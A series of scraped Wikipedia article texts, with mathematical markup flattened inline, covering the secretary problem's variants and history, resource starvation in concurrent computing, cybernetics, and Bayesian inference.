But forn>2{\displaystyle n>2}, the answer is yes: Alice can choose random numbers (which are dependent random variables) in such a way that Bob cannot play better than using the classical stopping strategy based on the relative ranks.[7]
The remainder of the article deals again with the secretary problem for a known number of applicants.
Stein, Seale & Rapoport 2003derived the expected success probabilities for several psychologically plausible heuristics that might be employed in the secretary problem. The heuristics they examined were:
Each heuristic has a single parametery. The figure (shown on right) displays the expected success probabilities for each heuristic as a function ofyfor problems withn= 80.
Finding the single best applicant might seem like a rather strict objective. One can imagine that the interviewer would rather hire a higher-valued applicant than a lower-valued one, and not only be concerned with getting the best. That is, the interviewer will derive some value from selecting an applicant that is not necessarily the best, and the derived value increases with the value of the one selected.
To model this problem, suppose that then{\displaystyle n}applicants have "true" values that arerandom variablesXdrawni.i.d.from auniform distributionon [0, 1]. Similar to the classical problem described above, the interviewer only observes whether each applicant is the best so far (a candidate), must accept or reject each on the spot, andmustaccept the last one if he/she is reached. (To be clear, the interviewer does not learn the actual relative rank ofeachapplicant. He/she learns only whether the applicant has relative rank 1.) However, in this version thepayoffis given by the true value of the selected applicant. For example, if he/she selects an applicant whose true value is 0.8, then he/she will earn 0.8. The interviewer's objective is to maximize the expected value of the selected applicant.
Since the applicant's values are i.i.d. draws from a uniform distribution on [0, 1], theexpected valueof thetth applicant given thatxt=max{x1,x2,…,xt}{\displaystyle x_{t}=\max \left\{x_{1},x_{2},\ldots ,x_{t}\right\}}is given by
As in the classical problem, the optimal policy is given by a threshold, which for this problem we will denote byc{\displaystyle c}, at which the interviewer should begin accepting candidates. Bearden showed thatcis either⌊n⌋{\displaystyle \lfloor {\sqrt {n}}\rfloor }or⌈n⌉{\displaystyle \lceil {\sqrt {n}}\rceil }.[8](In fact, whichever is closest ton{\displaystyle {\sqrt {n}}}.) This follows from the fact that given a problem withn{\displaystyle n}applicants, the expected payoff for some arbitrary threshold1≤c≤n{\displaystyle 1\leq c\leq n}is
DifferentiatingVn(c){\displaystyle V_{n}(c)}with respect toc, one gets
Since∂2V/∂c2<0{\displaystyle \partial ^{\,2}V/\partial c^{\,2}<0}for all permissible values ofc{\displaystyle c}, we find thatV{\displaystyle V}is maximized atc=n{\displaystyle c={\sqrt {n}}}. SinceVis convex inc{\displaystyle c}, the optimal integer-valued threshold must be either⌊n⌋{\displaystyle \lfloor {\sqrt {n}}\rfloor }or⌈n⌉{\displaystyle \lceil {\sqrt {n}}\rceil }. Thus, for most values ofn{\displaystyle n}the interviewer will begin accepting applicants sooner in the cardinal payoff version than in the classical version where the objective is to select the single best applicant. Note that this is not an asymptotic result: It holds for alln{\displaystyle n}. Interestingly, if each of then{\displaystyle n}secretaries has a fixed, distinct value from1{\displaystyle 1}ton{\displaystyle n}, thenV{\displaystyle V}is maximized atc=n−1{\displaystyle c={\sqrt {n}}-1}, with the same convexity claims as before.[9]For other known distributions, optimal play can be calculated via dynamic programming.
A more general form of this problem introduced by Palley and Kremer (2014)[10]assumes that as each new applicant arrives, the interviewer observes their rank relative to all of the applicants that have been observed previously. This model is consistent with the notion of an interviewerlearningas they continue the search process by accumulating a set of past data points that they can use to evaluate new candidates as they arrive. A benefit of this so-called partial-information model is that decisions and outcomes achieved given the relative rank information can be directly compared to the corresponding optimal decisions and outcomes if the interviewer had been given full information about the value of each applicant. This full-information problem, in which applicants are drawn independently from a known distribution and the interviewer seeks to maximize the expected value of the applicant selected, was originally solved by Moser (1956),[11]Sakaguchi (1961),[12]and Karlin (1962).
There are several variants of the secretary problem that also have simple and elegant solutions.
One variant replaces the desire to pick the best with the desire to pick the second-best.[13][14][15]For this problem, the probability of success for an even number of applicants is exactly0.25n2n(n−1){\displaystyle {\frac {0.25n^{2}}{n(n-1)}}}. This probability tends to 1/4 as n tends to infinity illustrating the fact that it is easier to pick the best than the second-best.
Consider the problem of picking the k best secretaries out of n candidates, using k tries.
In general, the optimal decision method starts by observingr=⌊nke1/k⌋{\displaystyle r=\left\lfloor {\frac {n}{ke^{1/k}}}\right\rfloor }candidates without picking any one of them, then pick every candidate that is better than those firstr{\displaystyle r}candidates until we run out of candidates or picks. Ifk{\displaystyle k}is held constant whilen→∞{\displaystyle n\to \infty }, then the probability of success converges to1ek{\displaystyle {\frac {1}{ek}}}.[16]ByVanderbei 1980, ifk=n/2{\displaystyle k=n/2}, then the probability of success is1n/2+1{\displaystyle {\frac {1}{n/2+1}}}.
In this variant, a player is allowedr{\displaystyle r}choices and wins if any choice is the best. An optimal strategy for this problem belongs to the class of strategies defined by a set of threshold numbers(a1,a2,...,ar){\displaystyle (a_{1},a_{2},...,a_{r})}, wherea1>a2>⋯>ar{\displaystyle a_{1}>a_{2}>\cdots >a_{r}}.
Specifically, imagine that you haver{\displaystyle r}letters of acceptance labelled from1{\displaystyle 1}tor{\displaystyle r}. You would haver{\displaystyle r}application officers, each holding one letter. You keep interviewing the candidates and rank them on a chart that every application officer can see. Now officeri{\displaystyle i}would send their letter of acceptance to the first candidate that is better than all candidates1{\displaystyle 1}toai{\displaystyle a_{i}}. (Unsent letters of acceptance are by default given to the last applicants, the same as in the standard secretary problem.)[17]
Atn→∞{\displaystyle n\rightarrow \infty }limit, eachai∼ne−ki{\displaystyle a_{i}\sim ne^{-k_{i}}}, for some rational numberki{\displaystyle k_{i}}.[18]
Whenr=2{\displaystyle r=2}, the probability of winning converges toe−1+e−32,(n→∞){\displaystyle e^{-1}+e^{-{\frac {3}{2}}},(n\rightarrow \infty )}. More generally, for positive integersr{\displaystyle r}, the probability of winning converges top1+p2+⋯+pr{\displaystyle p_{1}+p_{2}+\cdots +p_{r}}, wherepi=limn→∞ain{\displaystyle p_{i}=\lim _{n\rightarrow \infty }{\frac {a_{i}}{n}}}.[18]
[17]computed up tor=4{\displaystyle r=4}, withe−1+e−32+e−4724+e−27611152{\displaystyle e^{-1}+e^{-{\frac {3}{2}}}+e^{-{\frac {47}{24}}}+e^{-{\frac {2761}{1152}}}}.
Matsui & Ano 2016gave a general algorithm. For example,p5=e−41626371474560{\displaystyle p_{5}=e^{-{\frac {4162637}{1474560}}}}.
Experimentalpsychologistsandeconomistshave studied thedecision behaviorof actual people in secretary problem situations.[19]In large part, this work has shown that people tend to stop searching too soon. This may be explained, at least in part, by the cost of evaluating candidates. In real world settings, this might suggest that people do not search enough whenever they are faced with problems where the decision alternatives are encountered sequentially. For example, when trying to decide at which gas station along a highway to stop for gas, people might not search enough before stopping. If true, then they would tend to pay more for gas than if they had searched longer. The same may be true when people search online for airline tickets. Experimental research on problems such as the secretary problem is sometimes referred to asbehavioral operations research.
While there is a substantial body ofneuroscienceresearch on information integration, or the representation of belief, in perceptual decision-making tasks using both animal[20][21]and human subjects,[22]there is relatively little known about how the decision to stop gathering information is arrived at.
Researchers have studied the neural bases of solving the secretary problem in healthy volunteers usingfunctional MRI.[23]AMarkov decision process(MDP) was used to quantify the value of continuing to search versus committing to the current option. Decisions to take versus decline an option engagedparietalanddorsolateral prefrontalcortices, as well asventral striatum,anterior insula, andanterior cingulate. Therefore, brain regions previously implicated in evidence integration andrewardrepresentation encode threshold crossings that trigger decisions to commit to a choice.
The secretary problem was apparently introduced in 1949 byMerrill M. Flood, who called it the fiancée problem in a lecture he gave that year. He referred to it several times during the 1950s, for example, in a conference talk atPurdueon 9 May 1958, and it eventually became widely known in the folklore although nothing was published at the time. In 1958 he sent a letter toLeonard Gillman, with copies to a dozen friends includingSamuel Karlinand J. Robbins, outlining a proof of the optimum strategy, with an appendix by R. Palermo who proved that all strategies are dominated by a strategy of the form "reject the firstpunconditionally, then accept the next candidate who is better".[24]
The first publication was apparently byMartin Gardnerin Scientific American, February 1960. He had heard about it from John H. Fox Jr., and L. Gerald Marnie, who had independently come up with an equivalent problem in 1958; they called it the "game of googol". Fox and Marnie did not know the optimum solution; Gardner asked for advice fromLeo Moser, who (together with J. R. Pounder) provided a correct analysis for publication in the magazine. Soon afterwards, several mathematicians wrote to Gardner to tell him about the equivalent problem they had heard via the grapevine, all of which can most likely be traced to Flood's original work.[25]
The 1/e-law of best choice is due toF. Thomas Bruss.[26]
Ferguson has an extensive bibliography and points out that a similar (but different) problem had been considered byArthur Cayleyin 1875 and even byJohannes Keplerlong before that, who spent 2 years investigating 11 candidates for marriage during 1611 -- 1613 after the death of his first wife.[27]
The secretary problem can be generalized to the case where there are multiple different jobs. Again, there aren{\displaystyle n}applicants coming in random order. When a candidate arrives, he reveals a set of nonnegative numbers. Each value specifies her qualification for one of the jobs. The administrator not only has to decide whether or not to take the applicant but, if so, also has to assign her permanently to one of the jobs. The objective is to find an assignment where the sum of qualifications is as big as possible. This problem is identical to finding a maximum-weight matching in an edge-weightedbipartite graphwhere then{\displaystyle n}nodes of one side arrive online in random order. Thus, it is a special case of theonline bipartite matchingproblem.
By a generalization of the classic algorithm for the secretary problem, it is possible to obtain an assignment where the expected sum of qualifications is only a factor ofe{\displaystyle e}less than an optimal (offline) assignment.[28]
|
https://en.wikipedia.org/wiki/Secretary_problem
|
Incomputer science,resource starvationis a problem encountered inconcurrent computingwhere aprocessis perpetually denied necessaryresourcesto process its work.[1]Starvation may be caused by errors in a scheduling ormutual exclusionalgorithm, but can also be caused byresource leaks, and can be intentionally caused via adenial-of-service attacksuch as afork bomb.
When starvation is impossible in aconcurrent algorithm, the algorithm is calledstarvation-free,lockout-freed[2]or said to havefinite bypass.[3]This property is an instance ofliveness, and is one of the two requirements for any mutual exclusion algorithm; the other beingcorrectness. The name "finite bypass" means that any process (concurrent part) of the algorithm is bypassed at most a finite number times before being allowed access to theshared resource.[3]
Starvation is usually caused by an overly simplisticscheduling algorithm. For example, if a (poorly designed)multi-tasking systemalways switches between the first two tasks while a third never gets to run, then the third task is being starved ofCPU time. The scheduling algorithm, which is part of thekernel, is supposed to allocate resources equitably; that is, the algorithm should allocate resources so that no process perpetually lacks necessary resources.
Many operating system schedulers employ the concept of process priority. A high priority process A will run before a low priority process B. If the high priority process (process A) blocks and never yields, the low priority process (B) will (in some systems) never be scheduled—it will experience starvation. If there is an even higher priority process X, which is dependent on a result from process B, then process X might never finish, even though it is the most important process in the system. This condition is called apriority inversion. Modern scheduling algorithms normally contain code to guarantee that all processes will receive a minimum amount of each important resource (most often CPU time) in order to prevent any process from being subjected to starvation.
In computer networks, especially wireless networks,scheduling algorithmsmay suffer from scheduling starvation. An example ismaximum throughput scheduling.
Starvation is normally caused bydeadlockin that it causes a process to freeze. Two or more processes become deadlocked when each of them is doing nothing while waiting for a resource occupied by another program in the same set. On the other hand, a process is in starvation when it is waiting for a resource that is continuously given to other processes. Starvation-freedom is a stronger guarantee than the absence of deadlock: a mutual exclusion algorithm that must choose to allow one of two processes into acritical sectionand picks one arbitrarily is deadlock-free, but not starvation-free.[3]
A possible solution to starvation is to use a scheduling algorithm with priority queue that also uses theagingtechnique. Aging is a technique of gradually increasing the priority of processes that wait in the system for a long time.[4]
|
https://en.wikipedia.org/wiki/Resource_starvation
|
Collective intelligenceCollective actionSelf-organized criticalityHerd mentalityPhase transitionAgent-based modellingSynchronizationAnt colony optimizationParticle swarm optimizationSwarm behaviour
Social network analysisSmall-world networksCentralityMotifsGraph theoryScalingRobustnessSystems biologyDynamic networks
Evolutionary computationGenetic algorithmsGenetic programmingArtificial lifeMachine learningEvolutionary developmental biologyArtificial intelligenceEvolutionary robotics
Reaction–diffusion systemsPartial differential equationsDissipative structuresPercolationCellular automataSpatial ecologySelf-replication
Conversation theoryEntropyFeedbackGoal-orientedHomeostasisInformation theoryOperationalizationSecond-order cyberneticsSelf-referenceSystem dynamicsSystems scienceSystems thinkingSensemakingVariety
Ordinary differential equationsPhase spaceAttractorsPopulation dynamicsChaosMultistabilityBifurcation
Rational choice theoryBounded rationality
Cyberneticsis thetransdisciplinarystudy of circular causal[1]processes such asfeedbackandrecursion, where the effects of asystem's actions (its outputs) return as inputs to that system, influencing subsequent action.[2]It is concerned with general principles that are relevant across multiple contexts,[3]including inengineering,ecological,economic,biological,cognitiveandsocial systemsand also in practical activities such asdesigning,[4]learning, andmanaging. Cybernetics' transdisciplinary[5]character has meant that itintersectswith a number of other fields, leading to it having both wide influence and diverse interpretations.
The field is named after an example of circular causal feedback—that of steering a ship (the ancientGreekκυβερνήτης (kybernḗtēs) refers to the person who steers a ship). In steering a ship, the position of the rudder is adjusted in continual response to the effect it is observed as having, forming a feedback loop through which a steady course can be maintained in a changing environment, responding to disturbances from cross winds and tide.[6][7]
Cybernetics has its origins in exchanges between numerous disciplines during the1940s. Initial developments were consolidated through meetings such as theMacy Conferencesand theRatio Club. Early focuses included purposeful behaviour,[8]neural networks,heterarchy,information theory, and self-organising systems.[9]As cybernetics developed, it became broader in scope to include work in design, family therapy, management and organisation, pedagogy,sociology, the creative arts and the counterculture.[10]
Cybernetics has been defined in a variety of ways, reflecting "the richness of its conceptual base."[11]One of the best known definitions is that of the American scientistNorbert Wiener, who characterised cybernetics as concerned with "control and communication in the animal and the machine."[12]Another early definition is that of theMacy cybernetics conferences, where cybernetics was understood as the study of "circular causal and feedback mechanisms in biological and social systems."[13]Margaret Meademphasised the role of cybernetics as "a form of cross-disciplinary thought which made it possible for members of many disciplines to communicate with each other easily in a language which all could understand."[14]
Other definitions include:[15]"the art of governing or the science of government" (André-Marie Ampère); "the art of steersmanship" (Ross Ashby); "the study of systems of any nature which are capable of receiving, storing, and processing information so as to use it for control" (Andrey Kolmogorov); and "a branch of mathematics dealing with problems of control, recursiveness, and information, focuses on forms and the patterns that connect" (Gregory Bateson).
TheAncient Greekterm κυβερνητικός (kubernētikos, '(good at) steering') appears inPlato'sRepublic[16]andAlcibiades, where the metaphor of asteersmanis used to signify thegovernanceof people.[17]The French wordcybernétiquewas also used in 1834 by the physicistAndré-Marie Ampèreto denote the sciences of government in his classification system of human knowledge.
According to Norbert Wiener, the wordcyberneticswas coined by a research group involving himself andArturo Rosenbluethin the summer of 1947.[12]It has been attested in print since at least 1948 through Wiener's bookCybernetics: Or Control and Communication in the Animal and the Machine.[note 1]In the book, Wiener states:
After much consideration, we have come to the conclusion that all the existing terminology has too heavy a bias to one side or another to serve the future development of the field as well as it should; and as happens so often to scientists, we have been forced to coin at least one artificial neo-Greek expression to fill the gap. We have decided to call the entire field of control and communication theory, whether in the machine or in the animal, by the nameCybernetics, which we form from theGreekκυβερνήτηςorsteersman.
Moreover, Wiener explains, the term was chosen to recognizeJames Clerk Maxwell's 1868 publication on feedback mechanisms involvinggovernors, noting that the termgovernoris also derived from κυβερνήτης (kubernḗtēs) via a Latin corruptiongubernator. Finally, Wiener motivates the choice bysteering engines of a shipbeing "one of the earliest and best-developed forms of feedback mechanisms".[12]
The initial focus of cybernetics was on parallels between regulatory feedback processes in biological and technological systems. Two foundational articles were published in 1943: "Behavior, Purpose and Teleology" by Arturo Rosenblueth, Norbert Wiener, andJulian Bigelow– based on the research on living organisms that Rosenblueth did in Mexico – and the paper "A Logical Calculus of the Ideas Immanent in Nervous Activity" byWarren McCullochandWalter Pitts. The foundations of cybernetics were then developed through a series of transdisciplinary conferences funded by the Josiah Macy, Jr. Foundation, between 1946 and 1953. The conferences were chaired byMcCullochand had participants includedRoss Ashby,Gregory Bateson,Heinz von Foerster,Margaret Mead,John von Neumann, andNorbert Wiener. In the UK, similar focuses were explored by theRatio Club, an informal dining club of young psychiatrists, psychologists, physiologists, mathematicians and engineers that met between 1949 and 1958. Wiener introduced the neologismcyberneticsto denote the study of "teleological mechanisms" and popularized it through the bookCybernetics: Or Control and Communication in the Animal and the Machine.[12]
During the 1950s, cybernetics was developed as a primarily technical discipline, such as inQian Xuesen's 1954 "Engineering Cybernetics".In the Soviet Union, Cybernetics was initially considered with suspicion[19]but became accepted from the mid to late 1950s.
By the 1960s and 1970s, however, cybernetics' transdisciplinarity fragmented, with technical focuses separating into separate fields.Artificial intelligence(AI) was founded as a distinct discipline at theDartmouth workshopin 1956, differentiating itself from the broader cybernetics field. After some uneasy coexistence, AI gained funding and prominence. Consequently, cybernetic sciences such as the study ofartificial neural networkswere downplayed.[20]Similarly,computer sciencebecame defined as a distinct academic discipline in the 1950s and early 1960s.[21]
The second wave of cybernetics came to prominence from the 1960s onwards, with its focus inflecting away from technology toward social, ecological, and philosophical concerns. It was still grounded in biology, notablyMaturanaandVarela'sautopoiesis, and built on earlier work onself-organising systemsand the presence of anthropologists Mead and Bateson in the Macy meetings. The Biological Computer Laboratory, founded in 1958 and active until the mid-1970s under the direction ofHeinz von Foersterat theUniversity of Illinois at Urbana–Champaign, was a major incubator of this trend in cybernetics research.[22]
Focuses of the second wave of cybernetics included management cybernetics, such as Stafford Beer's biologically inspiredviable system model; work in family therapy, drawing on Bateson; social systems, such as in the work ofNiklas Luhmann; epistemology and pedagogy, such as in the development of radical constructivism.[23]Cybernetics' core theme of circular causality was developed beyond goal-oriented processes to concerns with reflexivity and recursion. This was especially so in the development ofsecond-order cybernetics(or the cybernetics of cybernetics), developed and promoted by Heinz von Foerster, which focused on questions of observation, cognition, epistemology, and ethics.
The 1960s onwards also saw cybernetics begin to develop exchanges with the creative arts, design, and architecture, notably with theCybernetic Serendipityexhibition (ICA, London, 1968), curated byJasia Reichardt,[24][25]and the unrealised Fun Palace project (London, unrealised, 1964 onwards), whereGordon Paskwas consultant to architect Cedric Price and theatre director Joan Littlewood.[26]
From the 1990s onwards, there has been a renewed interest in cybernetics from a number of directions. Early cybernetic work on artificial neural networks has been returned to as aparadigminmachine learningand artificial intelligence. The entanglements of society with emerging technologies has led to exchanges withfeminist technoscienceandposthumanism. Re-examinations of cybernetics' history have seen science studies scholars emphasising cybernetics' unusual qualities as a science, such as its "performativeontology".[27]Practical design disciplines have drawn on cybernetics fortheoreticalunderpinning and transdisciplinary connections. Emerging topics include how cybernetics' engagements with social, human, and ecological contexts might come together with its earlier technological focus, whether as a critical discourse[28][29]or a "new branch of engineering".[30]
The central theme in cybernetics isfeedback. Feedback is a process where the observed outcomes of actions are taken as inputs for further action in ways that support the pursuit, maintenance, or disruption of particular conditions, forming a circular causal relationship. In steering a ship, the helmsperson maintains a steady course in a changing environment by adjusting their steering in continual response to the effect it is observed as having.[6]
Other examples of circular causal feedback include: technological devices such as thethermostat, where the action of a heater responds to measured changes in temperature regulating the temperature of the room within a set range, and thecentrifugal governorof a steam engine, which regulates the engine speed; biological examples such as the coordination of volitional movement through thenervous systemand thehomeostaticprocesses that regulate variables such as blood sugar; and processes of social interaction such as conversation.[31]
Negative feedbackprocesses are those that maintain particular conditions by reducing (hence 'negative') the difference from a desired state, such as where a thermostat turns on a heater when it is too cold and turns a heater off when it is too hot.Positive feedbackprocesses increase (hence 'positive') the difference from a desired state. An example of positive feedback is when a microphone picks up the sound that it is producing through a speaker, which is then played through the speaker, and so on.
In addition to feedback, cybernetics is concerned with other forms of circular processes including:feedforward,recursion, andreflexivity.
Other key concepts and theories in cybernetics include:
Cybernetics' central concept of circular causality is of wide applicability, leading to diverse applications and relations with other fields. Many of the initial applications of cybernetics focused onengineering,biology, and exchanges between the two, such asmedical cyberneticsandroboticsand topics such asneural networks,heterarchy.[35]In the social and behavioral sciences, cybernetics has included and influenced work inanthropology,sociology,economics,family therapy,[36]cognitive science, andpsychology.[37][38]
As cybernetics has developed, it broadened in scope to include work in management, design,[4]pedagogy,[39][40]and the creative arts,[41]while also developing exchanges with constructivist philosophies, counter-cultural movements,[42]and media studies.[43]The development ofmanagement cyberneticshas led to a variety of applications, notably to the national economy of Chile under theAllendegovernment inProject Cybersyn. In design, cybernetics has been influential oninteractive architecture, human-computer interaction,[44]design research,[45]and the development ofsystemic designandmetadesignpractices.
Cybernetics is often understood within the context of systems science,systems theory, andsystems thinking.[46][47]Systems approaches influenced by cybernetics includecritical systems thinking, which incorporates theviable system model;systemic design; andsystem dynamics, which is based on the concept of causal feedback loops.
Many fields trace their origins in whole or part to work carried out in cybernetics, or were partially absorbed into cybernetics when it was developed. These includeartificial intelligence,bionics,cognitive science,control theory,complexity science,computer science,information theoryandrobotics. Some aspects of modernartificial intelligence, particularly thesocial machine, are often described in cybernetic terms.[48]
Academic journals with focuses in cybernetics include:
Academic societies primarily concerned with cybernetics or aspects of it include:
General
Societies and journals
|
https://en.wikipedia.org/wiki/Cybernetics
|
Bayesian inference(/ˈbeɪziən/BAY-zee-ənor/ˈbeɪʒən/BAY-zhən)[1]is a method ofstatistical inferencein whichBayes' theoremis used to calculate a probability of a hypothesis, given priorevidence, and update it as moreinformationbecomes available. Fundamentally, Bayesian inference uses aprior distributionto estimateposterior probabilities.Bayesian inference is an important technique instatistics, and especially inmathematical statistics. Bayesian updating is particularly important in thedynamic analysis of a sequence of data. Bayesian inference has found application in a wide range of activities, includingscience,engineering,philosophy,medicine,sport, andlaw. In the philosophy ofdecision theory, Bayesian inference is closely related to subjective probability, often called "Bayesian probability".
Bayesian inference derives theposterior probabilityas aconsequenceof twoantecedents: aprior probabilityand a "likelihood function" derived from astatistical modelfor the observed data. Bayesian inference computes the posterior probability according toBayes' theorem:P(H∣E)=P(E∣H)⋅P(H)P(E),{\displaystyle P(H\mid E)={\frac {P(E\mid H)\cdot P(H)}{P(E)}},}where
For different values ofH, only the factorsP(H){\displaystyle P(H)}andP(E∣H){\displaystyle P(E\mid H)}, both in the numerator, affect the value ofP(H∣E){\displaystyle P(H\mid E)}– the posterior probability of a hypothesis is proportional to its prior probability (its inherent likeliness) and the newly acquired likelihood (its compatibility with the new observed evidence).
In cases where¬H{\displaystyle \neg H}("notH"), thelogical negationofH, is a valid likelihood, Bayes' rule can be rewritten as follows:P(H∣E)=P(E∣H)P(H)P(E)=P(E∣H)P(H)P(E∣H)P(H)+P(E∣¬H)P(¬H)=11+(1P(H)−1)P(E∣¬H)P(E∣H){\displaystyle {\begin{aligned}P(H\mid E)&={\frac {P(E\mid H)P(H)}{P(E)}}\\\\&={\frac {P(E\mid H)P(H)}{P(E\mid H)P(H)+P(E\mid \neg H)P(\neg H)}}\\\\&={\frac {1}{1+\left({\frac {1}{P(H)}}-1\right){\frac {P(E\mid \neg H)}{P(E\mid H)}}}}\\\end{aligned}}}becauseP(E)=P(E∣H)P(H)+P(E∣¬H)P(¬H){\displaystyle P(E)=P(E\mid H)P(H)+P(E\mid \neg H)P(\neg H)}andP(H)+P(¬H)=1.{\displaystyle P(H)+P(\neg H)=1.}This focuses attention on the term(1P(H)−1)P(E∣¬H)P(E∣H).{\displaystyle \left({\tfrac {1}{P(H)}}-1\right){\tfrac {P(E\mid \neg H)}{P(E\mid H)}}.}If that term is approximately 1, then the probability of the hypothesis given the evidence,P(H∣E){\displaystyle P(H\mid E)}, is about12{\displaystyle {\tfrac {1}{2}}}, about 50% likely - equally likely or not likely. If that term is very small, close to zero, then the probability of the hypothesis, given the evidence,P(H∣E){\displaystyle P(H\mid E)}is close to 1 or the conditional hypothesis is quite likely. If that term is very large, much larger than 1, then the hypothesis, given the evidence, is quite unlikely. If the hypothesis (without consideration of evidence) is unlikely, thenP(H){\displaystyle P(H)}is small (but not necessarily astronomically small) and1P(H){\displaystyle {\tfrac {1}{P(H)}}}is much larger than 1 and this term can be approximated asP(E∣¬H)P(E∣H)⋅P(H){\displaystyle {\tfrac {P(E\mid \neg H)}{P(E\mid H)\cdot P(H)}}}and relevant probabilities can be compared directly to each other.
One quick and easy way to remember the equation would be to userule of multiplication:P(E∩H)=P(E∣H)P(H)=P(H∣E)P(E).{\displaystyle P(E\cap H)=P(E\mid H)P(H)=P(H\mid E)P(E).}
Bayesian updating is widely used and computationally convenient. However, it is not the only updating rule that might be considered rational.
Ian Hackingnoted that traditional "Dutch book" arguments did not specify Bayesian updating: they left open the possibility that non-Bayesian updating rules could avoid Dutch books. Hacking wrote:[2]"And neither the Dutch book argument nor any other in the personalist arsenal of proofs of the probability axioms entails the dynamic assumption. Not one entails Bayesianism. So the personalist requires the dynamic assumption to be Bayesian. It is true that in consistency a personalist could abandon the Bayesian model of learning from experience. Salt could lose its savour."
Indeed, there are non-Bayesian updating rules that also avoid Dutch books (as discussed in the literature on "probability kinematics") following the publication ofRichard C. Jeffrey's rule, which applies Bayes' rule to the case where the evidence itself is assigned a probability.[3]The additional hypotheses needed to uniquely require Bayesian updating have been deemed to be substantial, complicated, and unsatisfactory.[4]
If evidence is simultaneously used to update belief over a set of exclusive and exhaustive propositions, Bayesian inference may be thought of as acting on this belief distribution as a whole.
Suppose a process is generating independent and identically distributed eventsEn,n=1,2,3,…{\displaystyle E_{n},\ n=1,2,3,\ldots }, but theprobability distributionis unknown. Let the event spaceΩ{\displaystyle \Omega }represent the current state of belief for this process. Each model is represented by eventMm{\displaystyle M_{m}}. The conditional probabilitiesP(En∣Mm){\displaystyle P(E_{n}\mid M_{m})}are specified to define the models.P(Mm){\displaystyle P(M_{m})}is thedegree of beliefinMm{\displaystyle M_{m}}. Before the first inference step,{P(Mm)}{\displaystyle \{P(M_{m})\}}is a set ofinitial prior probabilities. These must sum to 1, but are otherwise arbitrary.
Suppose that the process is observed to generateE∈{En}{\displaystyle E\in \{E_{n}\}}. For eachM∈{Mm}{\displaystyle M\in \{M_{m}\}}, the priorP(M){\displaystyle P(M)}is updated to the posteriorP(M∣E){\displaystyle P(M\mid E)}. FromBayes' theorem:[5]
P(M∣E)=P(E∣M)∑mP(E∣Mm)P(Mm)⋅P(M).{\displaystyle P(M\mid E)={\frac {P(E\mid M)}{\sum _{m}{P(E\mid M_{m})P(M_{m})}}}\cdot P(M).}
Upon observation of further evidence, this procedure may be repeated.
For a sequence ofindependent and identically distributedobservationsE=(e1,…,en){\displaystyle \mathbf {E} =(e_{1},\dots ,e_{n})}, it can be shown by induction that repeated application of the above is equivalent toP(M∣E)=P(E∣M)∑mP(E∣Mm)P(Mm)⋅P(M),{\displaystyle P(M\mid \mathbf {E} )={\frac {P(\mathbf {E} \mid M)}{\sum _{m}{P(\mathbf {E} \mid M_{m})P(M_{m})}}}\cdot P(M),}whereP(E∣M)=∏kP(ek∣M).{\displaystyle P(\mathbf {E} \mid M)=\prod _{k}{P(e_{k}\mid M)}.}
By parameterizing the space of models, the belief in all models may be updated in a single step. The distribution of belief over the model space may then be thought of as a distribution of belief over the parameter space. The distributions in this section are expressed as continuous, represented by probability densities, as this is the usual situation. The technique is, however, equally applicable to discrete distributions.
Let the vectorθ{\displaystyle {\boldsymbol {\theta }}}span the parameter space. Let the initial prior distribution overθ{\displaystyle {\boldsymbol {\theta }}}bep(θ∣α){\displaystyle p({\boldsymbol {\theta }}\mid {\boldsymbol {\alpha }})}, whereα{\displaystyle {\boldsymbol {\alpha }}}is a set of parameters to the prior itself, orhyperparameters. LetE=(e1,…,en){\displaystyle \mathbf {E} =(e_{1},\dots ,e_{n})}be a sequence ofindependent and identically distributedevent observations, where allei{\displaystyle e_{i}}are distributed asp(e∣θ){\displaystyle p(e\mid {\boldsymbol {\theta }})}for someθ{\displaystyle {\boldsymbol {\theta }}}.Bayes' theoremis applied to find theposterior distributionoverθ{\displaystyle {\boldsymbol {\theta }}}:
p(θ∣E,α)=p(E∣θ,α)p(E∣α)⋅p(θ∣α)=p(E∣θ,α)∫p(E∣θ,α)p(θ∣α)dθ⋅p(θ∣α),{\displaystyle {\begin{aligned}p({\boldsymbol {\theta }}\mid \mathbf {E} ,{\boldsymbol {\alpha }})&={\frac {p(\mathbf {E} \mid {\boldsymbol {\theta }},{\boldsymbol {\alpha }})}{p(\mathbf {E} \mid {\boldsymbol {\alpha }})}}\cdot p({\boldsymbol {\theta }}\mid {\boldsymbol {\alpha }})\\&={\frac {p(\mathbf {E} \mid {\boldsymbol {\theta }},{\boldsymbol {\alpha }})}{\int p(\mathbf {E} \mid {\boldsymbol {\theta }},{\boldsymbol {\alpha }})p({\boldsymbol {\theta }}\mid {\boldsymbol {\alpha }})\,d{\boldsymbol {\theta }}}}\cdot p({\boldsymbol {\theta }}\mid {\boldsymbol {\alpha }}),\end{aligned}}}wherep(E∣θ,α)=∏kp(ek∣θ).{\displaystyle p(\mathbf {E} \mid {\boldsymbol {\theta }},{\boldsymbol {\alpha }})=\prod _{k}p(e_{k}\mid {\boldsymbol {\theta }}).}
PXy(A)=E(1A(X)|Y=y){\displaystyle P_{X}^{y}(A)=E(1_{A}(X)|Y=y)}Existence and uniqueness of the neededconditional expectationis a consequence of theRadon–Nikodym theorem. This was formulated byKolmogorovin his famous book from 1933. Kolmogorov underlines the importance of conditional probability by writing "I wish to call attention to ... and especially the theory of conditional probabilities and conditional expectations ..." in the Preface.[8]The Bayes theorem determines the posterior distribution from the prior distribution. Uniqueness requires continuity assumptions.[9]Bayes' theorem can be generalized to include improper prior distributions such as the uniform distribution on the real line.[10]ModernMarkov chain Monte Carlomethods have boosted the importance of Bayes' theorem including cases with improper priors.[11]
Bayesian theory calls for the use of the posterior predictive distribution to dopredictive inference, i.e., topredictthe distribution of a new, unobserved data point. That is, instead of a fixed point as a prediction, a distribution over possible points is returned. Only this way is the entire posterior distribution of the parameter(s) used. By comparison, prediction infrequentist statisticsoften involves finding an optimum point estimate of the parameter(s)—e.g., bymaximum likelihoodormaximum a posteriori estimation(MAP)—and then plugging this estimate into the formula for the distribution of a data point. This has the disadvantage that it does not account for any uncertainty in the value of the parameter, and hence will underestimate thevarianceof the predictive distribution.
In some instances, frequentist statistics can work around this problem. For example,confidence intervalsandprediction intervalsin frequentist statistics when constructed from anormal distributionwith unknownmeanandvarianceare constructed using aStudent's t-distribution. This correctly estimates the variance, due to the facts that (1) the average of normally distributed random variables is also normally distributed, and (2) the predictive distribution of a normally distributed data point with unknown mean and variance, using conjugate or uninformative priors, has a Student's t-distribution. In Bayesian statistics, however, the posterior predictive distribution can always be determined exactly—or at least to an arbitrary level of precision when numerical methods are used.
